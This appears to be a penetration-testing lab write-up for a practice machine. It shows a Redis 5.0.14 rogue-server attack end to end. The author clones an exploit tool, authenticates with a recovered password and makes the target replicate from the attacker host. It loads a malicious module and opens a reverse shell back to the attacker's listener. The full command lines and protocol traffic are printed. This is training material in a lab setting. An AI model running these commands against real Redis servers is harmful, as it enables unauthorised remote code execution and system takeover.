InfoSec LAB

Readys_Exploitation

Created: 3 min read

Redis Rogue Server

The target Redis instance runs the version 5.0.14. Testing it for the rogue server attack leveraging the Redis’s master/slave relationship.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ git clone https://github.com/n0b0dyCN/redis-rogue-server ; cd redis-rogue-server
Cloning into 'redis-rogue-server'...
remote: Enumerating objects: 87, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 87 (delta 0), reused 1 (delta 0), pack-reused 83 (from 1)
Receiving objects: 100% (87/87), 245.56 KiB | 3.78 MiB/s, done.
Resolving deltas: 100% (19/19), done.

Downloading the repo to Kali

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys/redis-rogue-server]
└─$ python3 redis-rogue-server.py --passwd='Ready4Redis?' --rhost=$IP --lhost=$tun0 --lport=6379 -v 
 
  BANNER = """______         _ _      ______                         _____
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig
 
[info] TARGET 192.168.154.166:6379
[info] SERVER 192.168.45.218:6379
[info] Setting master...
[info] Authenticating...
[<-] b'*2\r\n$4\r\nAUTH\r\n$12\r\nReady4Redis?\r\n'
[->] b'+OK\r\n'
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.218\r\n$4\r\n6379\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n7230e7cfef63ececa327b903ec3ce7eee1f02faf\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'-ERR Error loading the extension. Please check the server logs.\r\n'
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b'$0\r\n\r\n'
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.45.218
Reverse server port: 80
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$14\r\n192.168.45.218\r\n$2\r\n80\r\n'
[<-] b'*3\r\n$10\r\nsystem.rev\r\n$14\r\n192.168.45.218\r\n$2\r\n80\r\n'
[info] Reverse shell payload sent.
[info] Check at 192.168.45.218:80
[info] Unload module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'

Successfully loaded the exp.so module Spawning a reverse shell via the eexec method

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 80                 
listening on [any] 80 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 49410
whoami
redis
hostname
readys
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:d748  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:d7:48  txqueuelen 1000  (Ethernet)
        RX packets 2228181  bytes 247342222 (235.8 MiB)
        RX errors 0  dropped 268  overruns 0  frame 0
        TX packets 1477511  bytes 259125132 (247.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2410  bytes 238538 (232.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2410  bytes 238538 (232.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the redis account via the Redis Rogue Server technique

Interactive Graph View

Backlinks